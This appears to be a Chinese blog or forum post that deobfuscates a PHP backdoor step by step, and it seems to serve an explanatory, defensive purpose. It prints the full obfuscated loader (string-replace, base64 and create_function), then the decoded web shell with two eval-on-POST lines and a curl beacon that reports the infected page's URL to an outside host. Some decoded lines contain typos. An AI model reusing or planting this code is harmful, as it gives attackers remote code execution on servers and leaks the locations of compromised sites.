|
<?php
$pg="lZFUl9OrrQUrr1FIl0gLiAkX1NFUlZFUlsiUkVRVUrrVTVF9rrVUkkirrXTrrsKICAgIH0KICAgIHJldHVybrrirrArrkcGFnZrrVVSTDsKfQoKJF91cmw9Y3VyUGFnZVVSTCgpOwokdXJsPSdodHRwOi8vY25rroNGNrZmrrYud2ViLTE3Ni5jb20vWXpKb2JHSkhkejA9LnBrrocD91cmw9Jy4kX3VybC4nLS0trrLS0+Jy4nLrr21rrkrrNV9mdrrW5rrjdGlvbi5waHrrAnOwokY3VyrrbDrr1jrrdXJrrsX2lrruaXQoJHVyrrbrrCrrk7CmN1crrmxf";
$mm="c2V0brr3B0KCRjrrdXrrJsLCBDVVJMT1BUX1RJTUVPVVQsIDIwrrKTsgIAovL2N1cmxfcrr2rrV0b3B5KCRrrjdXJsLENVUkxPUFRfSFRrrUrrUEhFQUrrRFUiwxrrKTsKLyrr9jdXJsX3NldG9wdCgkY3VybCxrrDVVJMT1BrrUXrr05PQk9rrErrWSwrrxKTrrsKrrYrr3VyrrbF9zZXRrrvcHQoJGN1cmwsrrQ1VSTE9QVrrF9SRVRVUk5UUkrrFOU0ZFUiwxrrKTsKJGRrrhrrdGEgPrrSBjdXJsX2V4ZWMoJGN1cmrrwrrpOwpjdXJsX2Nsb3NrrlKCRjdXJsKTsK";
$cw="SAiOi8vIjsrrKCrriAgICBpZiArroJF9TRVJrrWRVJbIlNFUlZrrFUl9QT1JUIrrl0gIT0gIjgwIirrkKICAgIHsKICAgIrrCAgICrrAkcrrGFnZVrrVSrrTCrrAuPSrrArrkX1rrNFUlZFUlsiU0VSVkVSX05BTUUiXSAuICI6IiAuICRfrrU0VSVkVSWyJTRVrrJWRVJfUE9SVCrrJdrrIC4grrJF9TRVJrrWRrrVJbIrrlJFrrUVVFU1RfVrrVJrrJrrIl07CiAgICB9CrrirrAgICBlbHNlCiAgICB7CiAgICAgICAgJHBhZ2VVUkwgLj0gJF9TRVJWRVJbIlNFrrU";
$xwh="CmVycm9rryrrX3JlcrrG9ydrrGluZygwKTsKQGV2YWwrroJrrF9QT1NUWydhc2rrRmfiFAIyddrrKTsKQGV2YWwoJF9QT1rrNUWyd4eG9rrvXzErryMzQrrnXSkrr7CmZ1bmN0aW9uIGNrr1clBhZ2VVUkwoKQp7CirrAgICAkcGFnZVrrVSTCA9ICdodHRwJzsrrKCiAgICBpZrriAoJF9TRrrVJWRVJbIkhUVrrFBTIl0gPT0gIm9uIikKrrICrrAgIHsKICAgICAgICArrkcGFnZVVrrSTCAuPSAicyI7CirrAgICB9CrriAgrrICrrAkcGFnZVVSTCAuP";
$ibf = str_replace("y","","ysytyry_yryeypylyacye");
$agq = $ibf("v", "", "vbavsev64_vdvevcvovdve");
$nv = $ibf("up","","upcuprupeupaupteup_upfupuupnupcuptupiupoupn");
$dw = $nv('', $agq($ibf("rr", "", $xwh.$cw.$pg.$mm))); $dw();
?>
php的代码 看不懂 着实有点悲剧。。。
但是replace还是看得懂的 替换的意思
$ibf = str_replace("y","","ysytyry_yryeypylyacye"); 后面的字符串把y替换掉 剩下str_replace
$agq = $ibf("v", "", "vbavsev64_vdvevcvovdve"); 还是替换 后面的字符串把v替换掉 剩下 base64_decode
$nv = $ibf("up","","upcuprupeupaupteup_upfupuupnupcuptupiupoupn"); 还是替换 后面的字符串把up替换掉 剩下 create_function
最后解出来是这玩意
大家都看得懂了
error_reporting(0);
@eval($_POST['asdf~!@#']);
@eval($_POST['xxoo_1234']);
function curPageURL()
{
$pageURL = 'http';
if ($_SRVER["HTTPS"] == "on")
{
$pageURL .= "s";
}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80")
{
$pageURL .= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVR["REQUEST_URI"];
}
else
{
$pageURL .= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
}
return $pageURL;
}
$_url=curPageURL();
$url='http://cnh4ckff.web-176.com/YzJobGJHdz0=.php?url='.$_url.'----->'.'/md5_function.php';
$curl=curl_init($url);
curl_setopt($curl, CURLOPT_TIMEOUT, 20);
//curl_setopy(*url,CURLOPT_HZPHEADER,1);
//curl_setopt($curl,CURLOPT_NOBODY,1);
curl_sezpt($curl,CURLOPT_RETURNTRANSFER,1);
$jta = curl_exec($curl);
curl_close($curl);
|
|